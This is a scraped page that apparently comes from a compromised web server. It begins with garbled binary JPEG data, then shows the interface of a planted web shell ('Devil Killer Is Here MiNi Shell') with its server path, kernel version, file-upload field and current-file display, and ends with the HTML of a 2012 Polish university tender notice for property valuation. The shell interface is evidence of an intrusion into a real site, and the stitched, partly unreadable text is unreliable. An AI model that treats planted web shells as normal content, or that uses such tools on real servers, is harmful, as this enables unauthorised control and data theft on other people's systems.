JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120712/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120712/247134-N-2012.html

<p class="kh_header"><b>Warszawa: Geofizyczne usługi doradcze - wykonanie operatów szacunkowych wraz z ich aktualizacją</b><br>
<b>Numer ogłoszenia: 247134 - 2012; data zamieszczenia: 12.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Główna Gospodarstwa Wiejskiego - SZP , ul. Nowoursynowska 166, 02-787 Warszawa, woj. mazowieckie, tel. 022 5931390, faks 022 5931391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sggw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Geofizyczne usługi doradcze - wykonanie operatów szacunkowych wraz z ich aktualizacją.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Geofizyczne usługi doradcze - wykonanie operatów szacunkowych wraz z ich aktualizacją.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.12.10-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. 	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w zakresie:

	1)   Uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania: 
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ
	2)   Wiedzy i doświadczenia:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się wykonaniem co najmniej pięciu odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia na kwotę nie mniejszą niż 2 500,00 brutto każdy. Za usługi tego samego rodzaju co przedmiot zamówienia  Zamawiający uzna usługi wykonania  operatów określających stawki czynszu i wartość rynkową nieruchomości. 
Wykaz sporządzony zostanie zgodnie z treścią Rozporządzenia z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.

	3)   Potencjału technicznego:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ.
	3a)   Osób zdolnych  do wykonania zamówienia:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się dysponowaniem co najmniej jednej osoby w celu  wykonania zamówienia posiadającymi uprawnienia zawodowe do wykonywania zawodu rzeczoznawcy majątkowego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacjami o podstawie dysponowania tymi Konieczne jest dysponowanie co najmniej 1 osobą.
Wykaz sporządzony zostanie zgodnie z treścią Rozporządzenia z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.

	4)   Sytuacji ekonomicznej i finansowej:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ
Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia .

2. 	Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na podstawie treści złożonych oświadczeń lub dokumentów wymaganych zgodnie rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2009 r. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. 	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w zakresie:

	1)   Uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania: 
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ
	2)   Wiedzy i doświadczenia:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się wykonaniem co najmniej pięciu odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia na kwotę nie mniejszą niż 2 500,00 brutto każdy. Za usługi tego samego rodzaju co przedmiot zamówienia  Zamawiający uzna usługi wykonania  operatów określających stawki czynszu i wartość rynkową nieruchomości. 
Wykaz sporządzony zostanie zgodnie z treścią Rozporządzenia z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.

	3)   Potencjału technicznego:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ.
	3a)   Osób zdolnych  do wykonania zamówienia:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się dysponowaniem co najmniej jednej osoby w celu  wykonania zamówienia posiadającymi uprawnienia zawodowe do wykonywania zawodu rzeczoznawcy majątkowego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacjami o podstawie dysponowania tymi Konieczne jest dysponowanie co najmniej 1 osobą.
Wykaz sporządzony zostanie zgodnie z treścią Rozporządzenia z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.

	4)   Sytuacji ekonomicznej i finansowej:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ
Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia .

2. 	Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na podstawie treści złożonych oświadczeń lub dokumentów wymaganych zgodnie rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2009 r. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. 	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w zakresie:

	1)   Uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania: 
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ
	2)   Wiedzy i doświadczenia:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się wykonaniem co najmniej pięciu odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia na kwotę nie mniejszą niż 2 500,00 brutto każdy. Za usługi tego samego rodzaju co przedmiot zamówienia  Zamawiający uzna usługi wykonania  operatów określających stawki czynszu i wartość rynkową nieruchomości. 
Wykaz sporządzony zostanie zgodnie z treścią Rozporządzenia z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.

	3)   Potencjału technicznego:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ.
	3a)   Osób zdolnych  do wykonania zamówienia:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się dysponowaniem co najmniej jednej osoby w celu  wykonania zamówienia posiadającymi uprawnienia zawodowe do wykonywania zawodu rzeczoznawcy majątkowego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacjami o podstawie dysponowania tymi Konieczne jest dysponowanie co najmniej 1 osobą.
Wykaz sporządzony zostanie zgodnie z treścią Rozporządzenia z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.

	4)   Sytuacji ekonomicznej i finansowej:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ
Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia .

2. 	Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na podstawie treści złożonych oświadczeń lub dokumentów wymaganych zgodnie rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2009 r. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. 	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w zakresie:

	1)   Uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania: 
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ
	2)   Wiedzy i doświadczenia:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się wykonaniem co najmniej pięciu odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia na kwotę nie mniejszą niż 2 500,00 brutto każdy. Za usługi tego samego rodzaju co przedmiot zamówienia  Zamawiający uzna usługi wykonania  operatów określających stawki czynszu i wartość rynkową nieruchomości. 
Wykaz sporządzony zostanie zgodnie z treścią Rozporządzenia z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.

	3)   Potencjału technicznego:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ.
	3a)   Osób zdolnych  do wykonania zamówienia:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się dysponowaniem co najmniej jednej osoby w celu  wykonania zamówienia posiadającymi uprawnienia zawodowe do wykonywania zawodu rzeczoznawcy majątkowego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacjami o podstawie dysponowania tymi Konieczne jest dysponowanie co najmniej 1 osobą.
Wykaz sporządzony zostanie zgodnie z treścią Rozporządzenia z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.

	4)   Sytuacji ekonomicznej i finansowej:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ
Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia .

2. 	Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na podstawie treści złożonych oświadczeń lub dokumentów wymaganych zgodnie rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2009 r. Nr 226, poz. 1817).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. 	Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu w zakresie:

	1)   Uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania: 
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ
	2)   Wiedzy i doświadczenia:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się wykonaniem co najmniej pięciu odpowiadających swoim rodzajem usługom stanowiącym przedmiot zamówienia na kwotę nie mniejszą niż 2 500,00 brutto każdy. Za usługi tego samego rodzaju co przedmiot zamówienia  Zamawiający uzna usługi wykonania  operatów określających stawki czynszu i wartość rynkową nieruchomości. 
Wykaz sporządzony zostanie zgodnie z treścią Rozporządzenia z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.

	3)   Potencjału technicznego:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ.
	3a)   Osób zdolnych  do wykonania zamówienia:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ 
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże się dysponowaniem co najmniej jednej osoby w celu  wykonania zamówienia posiadającymi uprawnienia zawodowe do wykonywania zawodu rzeczoznawcy majątkowego wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacjami o podstawie dysponowania tymi Konieczne jest dysponowanie co najmniej 1 osobą.
Wykaz sporządzony zostanie zgodnie z treścią Rozporządzenia z dnia 30 grudnia 2009 roku w sprawie rodzajów dokumentów jakich Zamawiający może żądać od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.

	4)   Sytuacji ekonomicznej i finansowej:
Spełnia/nie spełnia - Podpisany załącznik nr 2 do SIWZ
Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia .

2. 	Ocena spełniania warunków udziału w postępowaniu będzie prowadzona na podstawie treści złożonych oświadczeń lub dokumentów wymaganych zgodnie rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2009 r. Nr 226, poz. 1817).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1a). Zamawiający przewiduje dokonanie zmian postanowień treści  zawartej umowy w przypadku zaistnienia następujących okoliczności:

a) na warunkach określonych we wzorze umowy w zakresie przedmiotu zamówienia, jeżeli zmiany są na korzyść Zmawiającego albo zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,
b) w zakresie terminu realizacji, jeżeli zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,
c) w zakresie wynagrodzenia, jeżeli zmiany te są korzystne dla Zamawiającego, a w szczególności w przypadku zmniejszenia realizacji przedmiotu zamówienia,
d) w zakresie wynagrodzenia w przypadku urzędowej zmiany stawek podatku od towarów i usług,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://szp.sggw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Główna Gospodarstwa Wiejskiego w Warszawie 
Sekcja Zamówień Publicznych
ul. Nowoursynowska 166, budynek 10, pokój 36
02-787 Warszawa, woj. mazowieckie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2012 godzina 09:00, miejsce: Szkoła Główna Gospodarstwa Wiejskiego w Warszawie 
Sekcja Zamówień Publicznych
ul. Nowoursynowska 166, budynek 10, pokój 36
02-787 Warszawa, woj. mazowieckie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I
Wykonanie wyceny wartości prawa własności nieruchomości położonej w miejscowości Obory, gmina Konstancin - Jeziorna zgodnie z wykazem działek w załączonej tabeli. 
Nieruchomości te opisane są w Księgach Wieczystych o numerach:WA5M/0029160/0 i WA5M/00293525/8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie wyceny wartości prawa własności nieruchomości położonej w miejscowości Obory, gmina Konstancin - Jeziorna zgodnie z wykazem działek w załączonej tabeli. 
Nieruchomości te opisane są w Księgach Wieczystych o numerach:WA5M/0029160/0 i WA5M/00293525/8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.12.10-8.</p></li>
